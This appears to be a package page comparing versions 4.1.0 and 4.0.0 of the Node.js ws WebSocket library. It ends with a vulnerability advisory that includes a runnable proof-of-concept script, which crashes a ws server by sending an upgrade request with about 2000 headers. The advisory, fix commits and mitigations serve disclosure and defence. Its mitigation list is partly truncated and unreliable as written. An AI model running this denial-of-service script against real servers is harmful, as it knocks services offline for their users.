Ws versions 4.1.0 and 4.0.0 are both robust websocket client and server libraries for Node.js, emphasizing speed and ease of use. Comparing the two reveals subtle yet important distinctions for developers. Version 4.1.0, released in February 2018, has a slightly newer release date than version 4.0.0, released in January 2018, representing incremental improvements. A notable difference lies in the dependencies: version 4.0.0 relies on the "ultron" package, while version 4.1.0 removes this dependency. Both versions share "safe-buffer" and "async-limiter" as dependencies.
Looking at development dependencies, both versions utilize tools such as nyc, eslint, benchmark, bufferutil, and utf-8-validate. However, there are version variations in mocha, eslint, eslint-plugin-node, eslint-plugin-import, and eslint-config-standard indicating updates to the testing and linting environments to accomodate latest standards with security fixes. Developers upgrading to 4.1.0 should note the change in dependencies, potentially impacting their existing code if it relied on ultron's functionality. The updated development dependencies likely reflect improvements in code quality, maintainability, and adherence to evolving coding conventions. Both versions are licensed under MIT, ensuring flexibility in usage. The author and repository information remain consistent, linking back to the websockets/ws GitHub repository.
All the vulnerabilities related to the version 4.1.0 of the package
ws affected by a DoS when handling a request with many HTTP headers
A request with a number of headers exceeding theserver.maxHeadersCount threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j < chars.length; j++) {
const key = chars[i] + chars[j];
headers[key] = 'x';
if (++count === 2000) break;
}
}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)
In vulnerable versions of ws, the issue can be mitigated in the following ways:
--max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent.server.maxHeadersCount to 0 so that no limit is applied.The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.